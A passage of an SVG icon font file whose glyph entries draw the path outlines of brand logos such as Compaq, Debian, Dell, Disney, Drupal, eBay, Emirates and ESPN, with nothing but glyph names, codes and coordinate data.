1-5 2-10 4-14s4-9 7-13c4-4 7-7 11-10 5-3 9-5 14-6 10-3 20-3 31 0 6 2 13 5 20 9 15 8 32 21 45 36 13 14 22 30 28 44 4 6 6 13 8 19z m77 170c-1-6-2-11-4-18-1-6-4-14-7-21s-6-13-9-18c-3-6-5-10-8-13-7-9-13-14-19-17-6-3-12-3-17 0-1 1-3 3-3 5-1 6 0 12 3 19 1 3 3 6 5 9 2 3 4 7 8 11 3 4 7 9 12 14 5 5 12 11 18 15 7 5 14 10 21 14z m-279-155c-5-6-7-8-9-10-2-2-3-3-4-3-2-2-5-2-7-2-1 0-3 1-3 3 1 1 0 1 1 4 1 1 2 4 5 10s8 15 13 25l44 75h-28l-5-7c-4 2-8 4-11 6-3 1-4 1-6 1-2 1-4 1-6 1-7 0-13-2-21-7-3-2-7-4-11-7-4-4-9-8-19-19-10-11-25-29-36-43-12-15-22-26-29-33-6-7-10-10-14-13-3-2-5-4-8-5-2-1-4-2-6-2-5-1-10-1-13 2-2 1-3 3-3 5-1 5 0 10 1 15 0 3 2 6 3 10 2 4 4 9 6 14 3 5 6 11 11 17 8 13 20 27 29 36 5 5 9 8 12 10 3 2 5 3 7 4 1 0 2 1 3 1 2 0 3-1 5-2 1-1 1-2 2-4 0-2 0-3 0-5-3 0-6-1-8-1-2-1-3-2-5-2-1-1-2-2-3-2-6-5-7-11-7-15 0-2 2-4 3-5 5-5 12-2 18 6 1 1 3 3 4 5 3 5 6 11 7 15 1 8 1 17-8 23-3 2-6 3-10 3-2 0-5 0-8-1-3 0-6-1-9-3-4-1-7-3-14-8-7-6-18-15-26-22-8-7-14-11-19-15-5-3-9-5-14-7-4-1-8-2-12-3 3 5 5 10 6 15 2 5 3 9 4 12 1 3 1 5 1 7 1 4 0 8-1 12-1 1-1 3-2 4-2 3-5 5-7 6-7 3-12 2-19 0-4 0-8-2-13-4-4-3-10-6-15-10-6-4-12-9-18-15-7-6-13-13-18-20-11-14-20-29-25-41-2-6-4-11-6-16-1-5-2-10-2-13 0-4 0-7 0-9 0-3 1-5 2-7s1-4 2-5c1-2 3-3 4-4 2-2 4-2 6-3 2-1 5-1 7-1s6 0 9 1c3 1 6 2 10 4 3 1 7 3 11 6 4 3 9 7 14 12 5 6 12 12 19 22 8 10 17 23 26 36l21 5c-6-11-12-23-15-30-4-8-5-11-6-15-2-11-3-22 2-30 2-3 4-5 6-7 3-2 5-4 9-5 3-1 7-1 10-1 10 0 19 2 30 9 4 3 9 6 15 11 6 6 13 14 21 22-1-7-1-14-1-19s0-7 0-8c1-2 1-3 1-4 1-1 1-2 2-3 2-3 4-4 6-5 8-2 14-1 22 3 3 1 6 3 10 6 4 3 9 7 14 12 0-3 0-6 0-8 0-2 0-3 0-4 1-2 1-3 2-5 3-3 6-4 10-4 1-1 3-1 5-1 7 0 15 3 24 9 5 3 10 7 15 13 6 5 12 12 18 21 7 8 13 19 19 30l-5 1c-8-11-16-21-22-27z m-248 1c-5-7-8-10-10-12-2-2-4-3-5-4-1-1-3-2-4-2-6-3-12-3-16 3-1 2-2 5-1 8 0 2 0 5 1 8s3 7 6 13c3 5 6 11 11 19 5 7 11 14 17 22 3-4 6-8 9-10 2-3 4-4 6-6s7-3 11-4c-10-14-19-27-25-35z m39 70c0-2 0-4-1-6 0-2-1-3-2-7-2-3-4-8-6-12-3 1-6 2-9 3-2 1-3 2-5 3-1 1-2 2-3 3-1 1-1 2-2 3-4 7-4 15 4 22 1 1 2 2 4 3 1 1 3 2 4 3 5 1 9 3 13 0 4-5 3-10 3-15z m160-63c-3-4-5-8-8-11-2-3-4-5-6-7-1-2-3-3-4-4-2-2-4-3-6-3-2-1-6-1-8 2-2 3-2 5-2 8 0 1 0 3 1 5 1 3 2 6 3 10 2 3 4 8 8 14 3 5 7 12 13 19 5 7 11 15 16 21 6 6 11 11 15 15 3 4 6 6 9 7 2 2 3 2 4 3 3 1 5 1 7 0 3-2 2-6 1-9 0 0 0-1-2-4-1-3-4-7-7-12l-34-54z" />
<glyph glyph-name="brand-compaq" horiz-adv-x="1000" unicode="&#xe8c1;" d="M457 827c83 0 167-3 251 1 101 4 190-68 198-185 4-71 3-142 1-213-1-52-39-84-94-83-54 0-89 32-91 85-2 56-4 112-4 167 0 19-5 26-26 25-155-2-311-4-467-4-31 0-37-9-36-39 2-105 2-209 2-314-1-25 6-34 33-34 174 0 347-3 521-4 60-1 107-22 140-76 28-47 62-90 94-135 32-46 27-86-14-121-41-35-97-36-132 2-32 33-60 70-87 107-13 18-27 24-50 24-155-1-311-1-467 0-19 0-38 0-56 2-102 9-167 74-169 175-3 142-5 283-3 425 1 114 84 194 198 196 86 2 172 1 258 1l0-2z" />
<glyph glyph-name="brand-debian" horiz-adv-x="1000" unicode="&#xe8c2;" d="M584-149z m-111 177c-31 0-40-25-45-39 0 17 1 74 3 104-21-10-34-12-47-13 12-5 12-27 12-96v-79c0-23 0-37-4-48 13-4 30-7 49-7 13 0 49 0 69 40 9 18 13 44 13 63 0 11-2 36-11 52-9 16-24 23-39 23z m-27-158c-6 0-12 1-16 2-1 12-1 32-1 55 0 28 3 42 5 49 7 23 22 23 25 23 24 0 29-34 29-59h0c0-30-5-70-42-70z m88 206l26-27 27 27-27 27z m44-89c0 23 0 30 3 43-12-5-20-7-46-10 4-3 7-5 9-17 2-16 2-93 1-121-1-22-2-24-6-31 8 2 15 3 25 3 9 0 14-1 20-3-7 14-7 26-6 136z m141-73v66c0 25-7 48-55 48-32 0-51-9-60-14 4-7 7-13 10-27 12 11 29 17 45 17 27 0 27-18 27-43-6 0-11 1-19 1-42 0-69-16-69-59h1c0-20 6-41 24-49 8-3 16-3 19-3 29 0 39 21 45 35 0-15 0-23 1-35 6 1 12 2 22 2 5 0 10-1 16-2-4 6-6 9-7 22 0 12 0 24 0 41z m-38-17c-7-14-18-19-27-19-19 0-23 16-23 32 0 30 27 33 39 33h17c0-21-1-35-6-46z m-173 950c7 3 18 1 25 3-10-1-19-1-29-2l4-1z m-243-142c8 17-3 5-3 11 2-15-11-21 3-11z m-14-613c-11-5-21-9-43-11 8-10 8-14 8-57-6 2-13 4-27 4-57 0-66-50-66-87 0-90 48-90 55-90 20 0 33 10 38 30l1-30c6 1 12 2 22 2 3 0 6 0 9-1 2 0 5 0 8-1-5 11-9 34-9 84 0 49 0 132 4 157z m-36-179c-1-10-2-34-25-34-24 0-30 27-31 39-3 13-3 24-3 29 0 15 1 59 38 59 11 0 17-3 22-6v-21h0c0-1 0-52-1-66z m114 116c-66 0-66-73-66-88 0-65 29-91 79-91 22 0 32 3 38 5-1 11 1 19 3 28-7-4-15-9-35-9-50 0-50 45-50 61h85l1 19h0c0 38-8 75-55 75z m23-71h-55c1 26 6 50 28 50 26 0 28-28 27-50z m-106 689c3 10 3 16 5 22-9-12-4-14-5-22z m203-141c-4 4-6 9-9 13 3-8 7-15 12-23l-3 10z m277 120c0 10 3 5 4 8-2 1-7 8-10 22 2 3 6-8 9-9-2 11-6 20-6 28-8 18-2-2-9 8-10 29 7 7 8 20 14-20 22-52 26-64-3 15-8 31-13 45 4-2-7 33 5 10-12 48-55 93-95 114 5-4 11-10 9-10-20 11-16 12-19 17-16 7-17-1-28 0-30 16-36 14-64 24l2-5c-20 6-24-3-45 0-2 1 7 3 13 4-19-2-18 4-37 0 5 3 10 5 15 8-16-1-38-9-31-2-26-11-72-28-97-52l-1 6c-12-14-51-42-55-61l-3 0c-6-11-10-22-15-33-8-14-11-5-10-7-16-32-24-59-30-81 4-7 0-43 2-72-8-143 100-281 218-313 17-6 43-6 65-7-26 8-30 4-55 13-18 9-22 18-35 29l5-9c-25 9-14 12-35 18l6 7c-9 1-22 14-26 21l-9-1c-10 13-16 23-16 30l-2-5c-4 6-40 50-21 40-4 3-8 5-13 14l4 4c-9 12-17 27-17 32 5-7 9-8 12-9-23 57-24 3-41 58h3c-3 5-4 9-7 14l2 16c-16 19-5 80-2 114 2 14 14 29 23 52l-6 1c11 18 61 75 85 72 11 14-3 0-5 3 25 26 33 19 50 23 18 11-16-4-7 4 31 8 22 18 63 22 4-2-10-3-14-7 26 13 82 10 119-7 42-19 90-78 92-133l2-1c-1-22 3-47-4-71l5 11c1-16-5-25-10-39l-9-4c-7-15 1-9-4-21-12-10-35-32-43-34-5 0 4 7 5 9-15-10-12-15-35-22l-1 2c-58-28-138 26-137 100-1-5-2-4-3-5-3 37 17 75 52 91 33 17 73 10 97-13-13 18-40 36-71 34-31 0-59-20-69-41-16-10-17-38-24-43-9-68 17-97 62-132 4-2 4-3 4-5 53-19 108-15 153 22 12 9 25 25 28 25-5-8 2-4-3-11 12 18-5 7 12 32l7-9c-3 16 19 35 17 59 1 2 2 3 3 1 0 4 0 7 0 12 2-5 5-11 6-17-4 19 5 32 7 42-1 2-6-7-8 14z m-295-128c7-9 12-19 21-27-6 13-11 18-19 34l-2-7z m170 35c6 9 11 18 13 28-2-7-6-13-9-19-20-12-2 7 0 14-21-26-3-15-4-23z m272-650v97c-1 20-1 49-41 49-33 0-40-22-45-33v35c-7-4-16-8-42-10 4-3 7-6 8-18 3-21 2-108 2-125-1-18-2-21-4-27 6 2 11 2 18 2 10 0 17-1 22-2-3 12-3 16-3 57 0 47 0 60 2 71 3 11 9 24 27 24 19 0 20-14 21-20 1-7 1-30 1-44v-35c0-9 0-34-2-41 0-5-1-7-3-12 7 2 11 3 18 3 14 0 18-2 25-3-4 10-4 22-4 32z m-312 629c4 3 7 6 10 9-8-2-17-2-25-2-11 0 2-5 15-7z m153-6c10 19 17 40 20 62l-2-4c-3-20-8-39-18-58z m-92 81c1 18-4 13-5 5 1-1 3-13 5-5z m100-21c-1-5-2-11-4-17 3 7 3 12 4 17z m-219-113c-15 6-29 17-40 30 6-9 13-17 21-24-14 5-33 34-39 35 25-43 99-76 138-59-18-1-41-1-61 7-9 4-20 13-18 15-1-2-1-3-1-4z m218 123c0-4 1-7 1-10 0 5 0 8-1 10z m-217-119c0 0 0 0 0 0z m13 382h0l-4-1h4z m-11 3c6-1 12-2 11-3 6 1 8 2-11 3z" />
<glyph glyph-name="brand-delicious" horiz-adv-x="1000" unicode="&#xe8c3;" d="M961 545c-38 89-102 166-181 220-40 27-84 48-131 62-47 15-97 23-149 23-69 0-135-14-195-39-89-38-166-102-220-181-27-40-48-84-63-131-14-47-22-97-22-149 0-69 14-135 39-195 38-89 102-166 181-220 40-27 84-48 131-63s97-22 149-22c69 0 135 14 195 39 89 38 166 102 220 181 27 40 48 84 63 131 14 47 22 97 22 149 0 69-14 135-39 195z m-62-363c-33-78-88-144-157-191-35-23-73-41-113-54-41-13-84-19-129-19v432h-432v0c0 60 12 117 34 168 32 78 87 144 156 191 35 23 73 41 114 54 40 13 83 19 128 19v-432h433c-1-60-13-117-34-168z" />
<glyph glyph-name="brand-dell" horiz-adv-x="1000" unicode="&#xe8c4;" d="M915 289v199h-104v-289h189v90h-85z m-205 199h-104v-91l-149-94-29 17 142 89-55 38-143-92-31 18 140 90-59 42-148-96s-39 79-113 79h-161v-289h178c85 0 99 88 99 88l154-92 175 116v-112h189v90h-85v199z m-575-201h-29v109h26c11 0 48-2 48-57 0-43-36-52-45-52z" />
<glyph glyph-name="brand-designbump" horiz-adv-x="1000" unicode="&#xe8c5;" d="M665 249l-38-33v356h175l-302 278-302-278h173v-88l-36 26-218-204h110v-456h200v456h123l-145 140v171h-122l217 199 217-199h-123v-439l-144-128h121v-200h200v200h112l-218 199z" />
<glyph glyph-name="brand-designfloat" horiz-adv-x="1000" unicode="&#xe8c6;" d="M571 600v98c133-31 230-123 260-267h-97c-25 89-85 144-163 169z m-144 0v98c-156-31-238-123-268-267h97c25 89 93 144 171 169z m-171-302h-97c30-167 112-245 268-275v97c-78 26-145 100-171 178z m681 62c0-245-198-444-442-444s-442 199-442 444c0 245 198 444 442 444s442-199 442-444z m-44 0c0 221-178 400-398 400s-398-179-398-400 178-399 398-399c220 0 398 179 398 399z m-398-202c-111 0-201 91-202 202 1 112 91 202 202 203 111-1 201-91 201-203 0-112-90-202-201-202z m157 202c0 87-70 158-157 158s-157-71-157-158c0-87 70-157 157-157 87 0 157 70 157 157z m-81-239v-98c133 31 230 108 260 275h-97c-26-78-85-152-163-177z m380-20c-27 0-49-22-49-49s22-49 49-49 49 22 49 49c0 27-22 49-49 49z m-118-125c-35 0-63-28-63-63 0-35 28-63 63-63 34 0 62 28 62 63 0 35-28 63-62 63z m102 285c-15 0-28-13-28-29s13-28 28-28 29 12 29 28-13 29-29 29z m-866-333c-17 0-31-14-31-31 0-18 14-32 31-32 17 0 31 14 31 32 0 17-14 31-31 31z m-10 166c-16 0-30-13-30-30s14-30 30-30 30 14 30 30-13 30-30 30z m98-76c-22 0-40-18-40-40 0-22 18-40 40-40 23 0 41 18 41 40 0 22-18 40-41 40z m794 613c-11 0-20-9-20-21 0-12 9-21 20-21 12 0 21 9 21 21 0 12-9 21-21 21z m-916 89c-19 0-35-16-35-36s16-35 35-35 36 15 36 35-16 36-36 36z m82 130c-25 0-45-20-45-45 0-24 20-44 45-44 24 0 44 20 44 44 0 25-20 45-44 45z m-70-277c-12 0-22-10-22-22 0-12 10-22 22-22s22 10 22 22-10 22-22 22z" />
<glyph glyph-name="brand-disney" horiz-adv-x="1000" unicode="&#xe8c7;" d="M335 469c-64 52-161 90-261 88-18-1-59-3-73-29-2-5-2-13 4-15 5-1 25-6 27 1 2 7-17 6-17 10 1 4 17 7 28 8 66 3 127-9 183-34 57-26 127-66 144-132 3-24-3-46-23-62-41-30-97-35-149-26-2 0-4 2-5 4-5 27-2 58-2 86 0 4 4 5 7 4 30-3 79-9 88-19 7-7-15-15-16-20 0-5 12-5 19-5 10 1 21 8 24 17 3 9 1 25-10 34-30 22-69 23-108 25-9 21 1 50-19 66-3 2-7 1-9-2-7-20-7-43-9-65-2 0-1-3-3-2-32-6-64-15-89-35-4-5-7-12-5-18 17-34 52-61 84-74 17-7 8-27 19-38 4-3 11-5 16-3 8 3 11 12 13 19 39-9 86-10 124 1 38 10 84 43 91 86 5 54-39 102-73 130z m-182-174c-16 2-33 11-46 19-13 7-26 18-36 31-4 6 2 11 7 13 24 9 51 12 76 12 2-1 0-2 2-3 0-25 0-48-3-72z m840 84c-3 6-12 14-21 13-35-11-59-48-83-74-1-1-2 0-4 1 0 33 31 52 32 84-1 2-3 3-4 3-15-13-28-28-36-44-12-23-20-53-6-78-6-16-14-35-16-43-2-8-26-70 3-94 5-1 11-8 14 0 6 39 16 76 30 111 35-4 65 18 83 40 17 22 20 56 8 81z m-39-73c-9-4-19-11-30-10 8 23 25 42 42 61 4 2 6 7 10 7 1-3 5-6 5-9 1-20-9-38-27-49z m-513 96c-3 2-7-1-9-5-7-24-7-53-8-79 1-16-2-35 7-48 2-4 10-5 15-4 4 2 10 3 10 8 1 37-1 70-4 105-1 10-2 18-11 23z m164-22c4 1 8 8 8 13-1 4-4 5-7 6-44 8-96 11-130-20-7-7-7-19-4-28 1-4 8-8 13-9 27-2 55-2 80-9 9-3 22-6 23-17 0-4-5-7-8-8-29-8-61-17-90-5-4 2-2 9 2 11 23 11 42-20 68-5 4 2 12 2 10 9-23 14-56 20-82 9-7-3-11-11-11-20 1-12 11-21 22-27 27-16 69-17 96 0 11 8 16 22 15 33-1 15-6 32-21 36-27 7-57 8-86 12-2 1-7 2-6 6 33 11 73 8 108 13z m89 44c-6-4-3-14-3-20 6-22 13-45 16-69 0-6 4-16-4-19-9 10-15 23-23 34-10 15-20 36-37 43-12-9-15-25-19-38-3-26-12-54-3-80 2-7 9-10 15-9 17 20 7 53 12 79 2 1 2 4 4 3 15-25 25-54 50-73 6-5 17 1 23 8 21 27 11 73 0 102-8 14-15 31-31 39z m-167 54c4 8 2 20-5 26-6 5-12 7-19 7-28 29-79 7-97-13-11-13-20-29-13-46 2-3 5-3 6-5 5-8-3-20 7-28 7-4 11 6 17 10 11-5 27-5 39-1 21 5 52 23 65 50z m-117-14c-3 7 0 14 7 21 6 7 17 11 27 13 2-1 0-2 0-3-15-9-21-21-34-31z m94 7c-18-17-41-24-66-22-4 4 2 7 3 10 18 19 38 38 63 36 3-2 5-4 6-6 3-7-1-13-6-18z m336-169c-14 3-29-1-43-3-7-1-14-5-20-1 3 9 2 21 11 27 7 3 31 0 45 1 6 1 7 13 6 16-8 11-26 5-37 6-2 0-4 1-6 2-2 7 3 14 7 19 20 2 42-1 58 6 4 2 3 7 0 10-3 5-9 14-13 15-22 2-47 0-69-5-9-1-19 0-28-4-2-15 16-15 23-23-6-7-4-22-16-22-4-1-7-6-6-11 7-12-5-22-7-33-4-16 1-34 13-39 32-14 62 5 85 24 3 5-1 11-3 15z" />
<glyph glyph-name="brand-dodge" horiz-adv-x="1000" unicode="&#xe8c8;" d="M980 728c0 63-35 104-98 108-120 7-240 14-360 14-133 0-266-8-399-14-60-2-105-37-103-106 5-154 9-309 15-463 1-28 7-57 13-86 16-76 67-127 132-163 101-56 203-109 304-164 13-7 22-4 33 2 98 52 196 103 292 156 63 35 120 79 138 153 12 51 19 104 22 156 6 87 6 174 9 261h2c0 48 0 97 0 146z m-42-4c-4-156-11-311-16-467-3-99-50-168-137-213-90-47-178-96-267-143-9-4-24-5-33-1-92 48-184 97-275 146-85 45-129 114-133 209-5 159-11 317-16 475-1 45 12 59 56 66 29 4 60 3 90 5 98 4 196 8 290 12 127-5 250-9 372-15 53-3 71-21 69-74z m-239-287c-4 24 7 43 28 45 20 2 33-13 33-38 0-5-1-10-2-15-5-35-12-70-17-106-1-8 0-21 4-23 8-4 20-2 27 2 10 6 20 15 25 25 18 37 33 74 50 111 2 6 6 13 9 19 4 7 12 14 12 20-2 47-18 88-64 107-49 20-94 9-134-25-40-35-64-81-80-134 25-7 26-23 21-45-5-22-13-36-36-42-22-7-27-21-22-52 11 8 23 16 37 26 4-27-3-42-26-49-8-3-18-15-19-23-6-37-10-75-14-118-20-14-45-12-72 6 18 40-1 79-5 117-1 7-12 16-19 18-25 7-29 23-28 50 16-11 28-20 42-30-5 23 3 47-28 57-39 13-46 60-12 87-17 50-39 95-77 130-39 34-85 47-134 28-47-19-65-61-69-109 0-6 3-17 5-17 21 0 18-18 21-29 13-46 29-89 64-121 8-8 23-8 35-11 1 11 5 21 4 31-3 19-9 37-12 55-3 22-7 44-6 65 1 25 16 37 36 33 17-4 29-24 25-44-10-53-3-69 45-89 17-8 25-19 29-36 9-34 14-71 31-102 19-36 38-71 44-112 1-9 9-23 18-26 45-19 78 1 87 49 3 16 5 34 14 46 32 44 46 94 55 147 3 17 11 26 27 33 48 20 58 39 48 89z m-375 8l8 2c11-26 22-52 36-83-47 13-56 35-44 81z m317-79l-6 5 35 77c19-48 8-71-29-82z m221 59c-10-51-23-101-54-144-11-16-26-31-42-39-33-18-61 4-57 41 1 4 1 8 2 11-2 1-4 2-5 2-3-8-6-16-8-24-13-55 20-91 74-81 41 7 65 35 81 71 23 51 30 106 30 161 0 8-4 15-6 23-5-7-13-13-15-21z m-566-131c-3-33-8-48-25-55-20-8-44-1-63 21-9 9-19 19-23 31-17 45-32 92-48 137-2 7-8 13-13 19l-8-4c0-72 5-143 45-206 20-32 50-50 90-47 33 2 56 27 54 60-1 15-6 30-9 44z m100 326c32-30 56-68 87-106 2 15 11 34 5 45-35 71-86 124-171 129-60 4-109-17-144-66 3 0 5 1 8 3 69 54 150 54 215-5z m249 28c63 29 122 19 176-23-19 32-54 54-94 61-83 14-154-23-205-104-16-25-13-45 1-71 31 57 63 110 122 137z" />
<glyph glyph-name="brand-dove" horiz-adv-x="1000" unicode="&#xe8c9;" d="M838 501c-23-10-43-28-63-44-16-14-29-31-44-46-6-6-14-10-22-15-2 12-1 20 2 27 25 80-36 177-135 180-66 3-125-16-185-38-56-20-111-43-168-59-66-18-134-33-205-31 26-19 52-37 81-50 78-38 164-41 249-44 29-1 45-12 45-29 0-19-16-28-47-28-82 1-158 25-232 56-37 16-73 34-114 53 6-11 10-18 14-24 33-54 77-96 126-134 100-75 212-126 330-163 107-33 208-14 291 63 34 32 61 73 88 112 42 58 77 121 151 146-47 78-93 97-162 68z m59-52c-11 0-19 8-19 19s8 19 19 19 19-9 19-19-8-19-19-19z" />
<glyph glyph-name="brand-drupal" horiz-adv-x="1000" unicode="&#xe8ca;" d="M690 625c-44 28-86 39-128 66-27 18-63 60-93 97-6-59-23-82-44-99-42-34-69-44-106-64-31-16-200-117-200-335s182-378 385-378c202 0 378 148 378 371s-165 325-192 342z m-509-169s-15 14 15 55c0 0 11 14 14 18 0 0 9 10 11 11 0 0 19 19 24 24 0 0 21 19 49 38 0 0 18 12 31 19 0 0 18 10 29 16 0 0 16 7 35 20 0 0 28 18 36 24 0 0 19 14 28 28 0 0 9 11 15 35 0 0 5 20 5 28 0 0 7-22 8-30 0 0 4-22 2-36 0 0-3-20-15-31 0 0-7-5-8-7 0 0-3-3-2-5 0 0 2-2 4-4 0 0 5-4 3-12 0 0 0-12-16-32 0 0-31-38-50-53 0 0-32-27-47-36 0 0-50-34-60-39 0 0-43-24-59-29 1 0-38-16-52-2z m514-464c-4-4-43-31-88-36-46-4-107-6-144 27-6 6-4 15 0 18 4 4 8 6 13 6s4 0 6-2c17-13 42-24 96-24s92 15 108 28c8 6 11 1 12-3 1-3 3-8-3-14z m-147 77c9 8 24 22 39 27 14 6 22 5 35 5s28 0 38-7c10-7 16-22 19-31 3-8 0-13-7-16-6-4-6-2-12 9-6 11-11 22-41 22s-38-10-52-22c-15-12-20-16-25-9-5 6-3 13 6 22z m222-7c-30 2-90 97-129 98-49 2-154-102-237-102-51 0-66 8-83 19-25 18-38 45-37 82 1 65 62 127 140 128 98 1 166-98 216-97 42 1 122 83 162 83 42 0 53-43 53-70 0-26-8-73-28-102-20-30-33-41-57-39z" />
<glyph glyph-name="brand-ebay" horiz-adv-x="1000" unicode="&#xe8cb;" d="M745 286c0 34 1 65 0 87-1 25 1 85-107 90 0 0-105 9-115-68h53s4 35 58 34c51-1 60-26 60-57 0 0-44 0-58 0-26 0-114-3-127-55 2 8 3 17 3 26 1 76-57 119-120 119-63 0-90-37-90-37v126h-50l0-201c-1 36-18 112-123 112-125 0-130-97-129-123 0 0-6-113 126-113 114 0 120 71 120 71l-53 0s-10-39-67-38c-72 1-75 71-75 71h201s1 2 1 5l0-50s0-31-2-52h49l2 30s23-37 89-37c58 0 106 31 118 89l0-2c-11-67 49-88 96-87 46 0 73 14 93 39l2-31 46 0c0 0-1 17-1 52z m-692 79s3 64 75 64c72 0 72-64 72-64h-147z m328-105c-80-1-78 84-78 84s-3 82 78 84c81 2 78-86 78-86s1-81-78-82z m232-2s-50 0-53 40c-3 43 78 41 78 41l57 0c0 0 9-82-82-81z m334 196l-86-171-85 171h-59l117-220-45-84h56l155 304-53 0z" />
<glyph glyph-name="brand-eleven" horiz-adv-x="1000" unicode="&#xe8cc;" d="M711 660h-473l1-178h249c35 65 177 161 223 178z m-357-362h-42v-134h75v29h-33z m-131-134h75v29h-33v25h33v25h-33v25h33v30h-75z m294 134h-37l21-134h54l26 134h-32l-16-90z m-74 19l191-1c5 51 74 135 142 157v196c-186-83-307-209-333-352z m30-124h-33v25h33v25h-33v25h33v30h-75v-134h75z m250 97l0-32v40h-41v-134h41v94c2 15 23 11 23 2v-96h40v113c0 24-33 34-63 13z m-705 560v-1000h964v1000h-964z m802-862c0-22-14-40-31-40h-169v-37h-231v37h-175c-17 0-31 18-31 40l-73 741c0 22 17 39 38 39h706c21 0 38-17 38-39l-72-741z m-230 176h75v29h-33v25h33v25h-33v25h33v30h-75z m-187-240h205c0 83 1 161 7 226h-202c-6-65-10-143-10-226z" />
<glyph glyph-name="brand-emirates" horiz-adv-x="1000" unicode="&#xe8cd;" d="M414 345c21-19 26-29 28-37 1 1 27 23 27 31 0 12-7 16-26 35l-29-29z m-28 29l-29-29c20-19 26-29 29-37 0 1 26 23 26 31 0 12-8 16-26 35z m7 80h78c5 0 11 0 17 6 4 3 24 25 27 26 3 4 6 10 6 16v29c0 28-23 51-23 51s4 3 4 16v30s10-8 10-13c0 0 11 12 16 18 9 7-4 23-10 28-16 16-16 34-16 34l-18-19c-9-9-6-25 10-40v-39c0-5-3-8-3-8s-23 21-45 21h-30c-20 0-36-18-37-19-12-12-12-30-3-39l21-22s-4 35 0 59c2 8 13 15 22 9 17-11 45-36 45-36s-58-59-59-62c-3-1-11-8-19-8s-13 5-17 10v-29c-1-10 12-19 24-19z m27 51c2 1 51 51 51 51s27-28 36-44c4-7 8-22-15-22h-88c8 5 9 6 16 15z m98-308h29c29 0 55 13 72 30 17 17 23 40 23 62v60c0 20-12 32-16 35-1 3-14 14-14 14v-46s14-14 15-17c13-13 13-38-26-77-7-5-27-24-54-24h-71l42-37z m-197 197v-71c0-46 37-87 83-87h39c23 0 31 5 45 18l14 15c8 8 16 15 16 39v23c0 20-11 28-17 34l-13 13v-47l14-15c20-14 5-42-14-42h-85c-30-1-72 26-72 72v39c0 39-10 39-10 39h-16c0 0 16-9 16-30z m206 63c4 3 39 33 41 38 5 5 16 18 16 38v113c0 15 7 26 12 30s17 16 20 17l-10 2c-3-3-41-38-45-41-3-3-13-18-13-37v-115c0-9-4-20-8-25-3-3-21-18-23-20h10z m-189 62v-56c2-16 12-72 63-72h147v-95c0-14-4-23-8-29-5-3-23-20-23-20h10c4 3 37 33 40 36 7 9 17 19 17 48v59s13 14 18 17c2 3 28 27 28 27 0-34 25-40 38-27 6 6 23 21 27 24 12 13 19 49-11 49-18 0-39-26-41-29-7 5-13 13-13 13v-21c-3-4-14-13-23-13h-23v23c0 10 5 23 9 27 4 5 22 20 23 22h-10c-4-4-40-36-45-42-8-8-13-26-13-30h-165c-22 0-35 20-35 37v44c0 34-8 38-10 38h-14c8-4 14-20 14-30z m338-72c13-16 5-32-14-17-4 3-14 16-14 16 5 5 24 8 28 1z m169-288c-42 0-65-39-65-80s27-74 67-74c34 0 44 13 44 13v25c-16-29-42-19-48-16-18 7-20 32-20 32 14 17 32 13 55 37 29 30 7 63-33 63z m8-54c-10-19-24-21-33-31 0 0-4 71 22 74 23 1 17-30 11-43z m-184-68v85c0 20-23 37-46 37-23 0-39-11-39-11v-28s9 22 30 22c21 0 22-10 22-16 0 0 1-6-3-16-10-15-82-18-70-76 4-21 18-29 37-29s29 10 33 19c3-17 12-17 12-17h40s-16 10-16 30z m-36-4c-4-5-7-9-24-9-9 0-16 9-16 19 0 37 32 43 40 53v-63z m112 161s-8-16-27-30c-12-10-36-22-36-22h26v-106c0-29 13-29 13-29h40s-16 10-16 29v106h10c13 0 23-7 23-7v23h-33v36z m255-138c0 10-3 18-9 27-10 12-27 20-40 29-7 4-11 13-11 16 0 5 2 15 23 15 20 0 28-21 28-21v26s-15 11-39 11c-24 0-46-16-46-36 2-18 9-30 23-40 6-4 13-9 22-13 11-7 16-14 16-23 0-10-10-25-30-25-22 0-29 22-29 22v-27s14-12 37-12c28 0 56 22 55 51z m-882-29h-45c-14 0-13 11-14 22v64h22s27 2 41-7c0 0-10 28-41 28h-22v20s0 17-4 23h30c24 0 45 0 66-13 0 0-4 33-55 33h-96s17-15 16-43l1-118c0-29 12-31 12-31h95c21 0 30 16 30 25v11c0 0-7-14-36-14z m407 101c13 8 32 5 42-6v24s-3 12-20 12c-26 0-32-30-32-30-1 24-9 31-26 31h-24s14-5 14-31v-91c0-30 12-30 12-30h40c-2 0-16 10-16 30v75c2 7 6 11 10 16z m-100 80c-11 0-19-8-19-18s8-19 19-19 18 8 18 19-8 18-18 18z m-52-171v82c0 32-26 40-46 40-25 0-33-21-36-28-6 20-26 28-42 28-32 0-39-28-39-28s-1 27-26 27h-24s14-6 14-30v-91c0-30 12-32 12-32h40c-2 2-16 12-16 32v81c1 4 7 15 25 15 10 0 20-10 20-21v-75c0-30 11-30 11-30h41s-15 10-15 30v81c2 4 6 15 22 15 11 0 21-10 21-21v-75c0-32 13-30 13-30h41c0 0-16 10-16 30z m70 0v88c0 33-17 33-26 33h-24s13-6 13-30v-91c0-32 13-30 13-30h40s-16 10-16 30z" />
<glyph glyph-name="brand-espn" horiz-adv-x="1000" unicode="&#xe8ce;" d="M259 404c1 17 2 33 12 46 12 16 29 21 47 23 3 0 5 0 8 0 121 0 243 0 364 0 8 0 16-1 23-3 20-4 32-20 32-40 0-8-1-16-2-23 0-1-1-2-2-3-1 0-2 0-3 0l-479 0z m145-111c2 9 3 18 4 28h-6c-34 0-69-1-104 0-5 0-11 0-16 1-16 5-26 17-27 34-1 7-1 14-1 22h181c13 0 24-2 35-9 13-8 19-20 18-35 0-13-2-26-3-38-1-7-2-14-3-21-4-23-18-37-40-44-9-3-19-4-29-4-56-1-113 0-169 0h-7c0 1 0 3 0 4 2 19 4 37 6 56 1 4 2 6 7 6 50-1 100 0 149 0l5 0z m-176 0c-1-8-2-14-2-21-2-14-4-27-5-41-1-3-2-4-5-4-71 0-141 0-212 0-1 0-2 0-4 0 1 10 2 19 3 28 5 36 9 71 14 106 0 5 1 9 1 14 0 2 1 3 4 3 0 0 1 0 2 0h215c-3-19-5-38-7-57h-138c-1-10-2-19-3-28h137z m358 28c-4-32-8-63-12-94h-82c6 50 13 100 19 151h230c-3-11-4-22-7-32-6-15-19-22-34-25-4 0-9 0-13 0-32-1-64 0-95 0h-6z m174 83c3 24 5 46 8 69h5c58 0 117 1 175 0 8 0 17-1 25-4 17-6 26-19 27-37 0-8-1-17-2-25 0-1-2-2-3-3-2 0-4 0-7 0h-228z m-509 69c-3-23-6-46-9-69h-220c3 24 6 46 9 69h220z m487-245c6 49 12 99 18 150h83c-1-5-1-10-2-14l-12-98c-2-12-3-24-5-36 0-1-2-3-3-3-26 0-52 0-78 0 0 0 0 0-1 1z m238-1h-82l18 